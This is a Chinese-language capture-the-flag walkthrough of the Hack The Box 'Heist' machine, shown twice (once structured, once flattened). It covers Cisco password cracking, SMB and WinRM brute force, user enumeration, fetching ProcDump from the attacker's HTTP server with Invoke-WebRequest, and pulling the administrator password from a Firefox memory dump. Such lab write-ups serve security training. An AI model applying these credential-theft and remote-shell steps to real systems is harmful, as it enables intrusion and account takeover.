[HTB]"Heist"靶机渗透详细思路
字数 2203 2025-08-18 11:39:11

HTB "Heist"靶机渗透详细思路

一、信息搜集

初始发现

  • 目标网站是一个登录框,尝试弱口令和SQL注入均未成功
  • 发现"login as guest"页面,在留言中发现Hazard提到思科路由器存在问题,并附上了配置文件

密码破解

  1. 从配置文件中提取出三个加密密码(思科路由器专用加密)
  2. 使用在线工具破解"password 7"类型密码:
    • 网站:http://www.ifm.net.nz/cookbooks/passwordcracker.html
  3. 对"password 5"类型密码使用John the Ripper爆破:
    • 命令:john –wordlist=rockyou.txt pass.txt

获取的凭证

用户名 密码
rout3r $uperP@ssword
admin Q4)sJu\8Y$zqw
admin Q4)sJu\8Y$zqw

端口扫描

  1. 初始扫描:nmap -p- 10.10.10.149 -T5
  2. 详细扫描:nmap -sC -sV -p 80,135,445,5985,49669 10.10.10.149
    • 发现开放端口:80(IIS)、135、445(SMB)、5985(WinRM)、49669
    • 推测操作系统:Windows 10或Server 2016(基于IIS版本)

二、SMB爆破

使用Metasploit进行SMB爆破

  1. 使用模块:smb_login
  2. 字典:之前获取的用户名和密码组合
  3. 成功凭证:
    • 用户名:hazard
    • 密码:stealth1agent

用户枚举

  1. 使用工具:Impacket的lookupsid
  2. 命令参考:lookupsid.py domain/user:password@target_ip
  3. 获取的用户列表:
    • Administrator
    • Guest
    • Hazard
    • Chase
    • Jason
    • Support

已知用户和密码汇总

用户名 密码
rout3r $uperP@ssword
admin Q4)sJu\8Y$zqw
hazard stealth1agent

三、WinRM爆破

使用Metasploit进行WinRM爆破

  1. 使用模块:winrm_login
  2. 成功凭证:
    • 用户名:Chase
    • 密码:Q4)sJu\8qz*A3?d

四、获取初始Shell

通过WinRM获取PowerShell

  1. 使用POC:https://alionder.net/winrm-shell/
  2. 成功获取PowerShell会话
  3. 读取user.txt获取用户flag

权限提升准备

  1. 发现Firefox进程正在运行(PID: 6804)
  2. 计划提取Firefox进程内存以寻找敏感信息

五、进程内存转储

上传ProcDump

  1. 下载地址:https://docs.microsoft.com/en-us/sysinternals/downloads/procdump
  2. 上传方法:
    • 本地开启HTTP服务
    • 使用PowerShell命令:Invoke-WebRequest -Uri "http://your_ip/procdump.exe" -OutFile "procdump.exe"

转储Firefox进程

  1. 命令:./procdump.exe -mp 6804
  2. 生成转储文件:firefox.exe_191209_133946.dmp

分析转储文件

  1. 搜索密码:get-content firefox.exe_191209_133946.dmp | findstr "password"
  2. 发现管理员凭证:
    • 用户名:Administrator
    • 密码:4dD!5}x/re8]FBuZ

六、获取管理员Shell

使用evil-winrm.rb

  1. 工具地址:https://github.com/Hackplayers/evil-winrm
  2. 使用获取的管理员凭证登录
  3. 成功获取系统权限并读取root.txt

总结:渗透流程

  1. 信息搜集阶段

    • 发现网站登录页面和guest留言
    • 从思科配置文件中提取加密密码
    • 使用在线工具和John破解密码
    • 端口扫描识别服务

  2. 凭证爆破阶段

    • 使用已知密码组合爆破SMB服务
    • 枚举系统用户
    • 爆破WinRM服务

  3. 初始访问

    • 通过WinRM获取PowerShell会话
    • 读取用户flag

  4. 权限提升

    • 识别运行中的Firefox进程
    • 上传ProcDump工具
    • 转储并分析进程内存
    • 提取管理员凭证

  5. 最终控制

    • 使用evil-winrm.rb获取管理员shell
    • 读取系统flag

关键工具和技术

  1. 密码破解:

    • 在线思科密码破解工具
    • John the Ripper

  2. 枚举和爆破:

    • Impacket的lookupsid
    • Metasploit的smb_login和winrm_login模块

  3. 进程分析:

    • ProcDump
    • 内存字符串搜索

  4. 远程管理:

    • WinRM
    • evil-winrm.rb工具

学习要点

  1. 配置文件中的敏感信息可能采用特定加密方式
  2. 一个服务的密码可能适用于其他服务
  3. 运行中的进程可能包含敏感信息
  4. Windows内存转储和分析技术
  5. WinRM作为攻击向量的利用方式
HTB "Heist"靶机渗透详细思路 一、信息搜集 初始发现 目标网站是一个登录框,尝试弱口令和SQL注入均未成功 发现"login as guest"页面,在留言中发现Hazard提到思科路由器存在问题,并附上了配置文件 密码破解 从配置文件中提取出三个加密密码(思科路由器专用加密) 使用在线工具破解"password 7"类型密码: 网站:http://www.ifm.net.nz/cookbooks/passwordcracker.html 对"password 5"类型密码使用John the Ripper爆破: 命令: john –wordlist=rockyou.txt pass.txt 获取的凭证 | 用户名 | 密码 | |--------|------| | rout3r | $uperP@ssword | | admin | Q4)sJu\8Y$zqw | | admin | Q4)sJu\8Y$zqw | 端口扫描 初始扫描: nmap -p- 10.10.10.149 -T5 详细扫描: nmap -sC -sV -p 80,135,445,5985,49669 10.10.10.149 发现开放端口:80(IIS)、135、445(SMB)、5985(WinRM)、49669 推测操作系统:Windows 10或Server 2016(基于IIS版本) 二、SMB爆破 使用Metasploit进行SMB爆破 使用模块: smb_login 字典:之前获取的用户名和密码组合 成功凭证: 用户名:hazard 密码:stealth1agent 用户枚举 使用工具:Impacket的lookupsid 命令参考: lookupsid.py domain/user:password@target_ip 获取的用户列表: Administrator Guest Hazard Chase Jason Support 已知用户和密码汇总 | 用户名 | 密码 | |--------|------| | rout3r | $uperP@ssword | | admin | Q4)sJu\8Y$zqw | | hazard | stealth1agent | 三、WinRM爆破 使用Metasploit进行WinRM爆破 使用模块: winrm_login 成功凭证: 用户名:Chase 密码:Q4)sJu\8qz* A3?d 四、获取初始Shell 通过WinRM获取PowerShell 使用POC:https://alionder.net/winrm-shell/ 成功获取PowerShell会话 读取user.txt获取用户flag 权限提升准备 发现Firefox进程正在运行(PID: 6804) 计划提取Firefox进程内存以寻找敏感信息 五、进程内存转储 上传ProcDump 下载地址:https://docs.microsoft.com/en-us/sysinternals/downloads/procdump 上传方法: 本地开启HTTP服务 使用PowerShell命令: Invoke-WebRequest -Uri "http://your_ip/procdump.exe" -OutFile "procdump.exe" 转储Firefox进程 命令: ./procdump.exe -mp 6804 生成转储文件: firefox.exe_191209_133946.dmp 分析转储文件 搜索密码: get-content firefox.exe_191209_133946.dmp | findstr "password" 发现管理员凭证: 用户名:Administrator 密码:4dD!5}x/re8 ]FBuZ 六、获取管理员Shell 使用evil-winrm.rb 工具地址:https://github.com/Hackplayers/evil-winrm 使用获取的管理员凭证登录 成功获取系统权限并读取root.txt 总结:渗透流程 信息搜集阶段 发现网站登录页面和guest留言 从思科配置文件中提取加密密码 使用在线工具和John破解密码 端口扫描识别服务 凭证爆破阶段 使用已知密码组合爆破SMB服务 枚举系统用户 爆破WinRM服务 初始访问 通过WinRM获取PowerShell会话 读取用户flag 权限提升 识别运行中的Firefox进程 上传ProcDump工具 转储并分析进程内存 提取管理员凭证 最终控制 使用evil-winrm.rb获取管理员shell 读取系统flag 关键工具和技术 密码破解: 在线思科密码破解工具 John the Ripper 枚举和爆破: Impacket的lookupsid Metasploit的smb_ login和winrm_ login模块 进程分析: ProcDump 内存字符串搜索 远程管理: WinRM evil-winrm.rb工具 学习要点 配置文件中的敏感信息可能采用特定加密方式 一个服务的密码可能适用于其他服务 运行中的进程可能包含敏感信息 Windows内存转储和分析技术 WinRM作为攻击向量的利用方式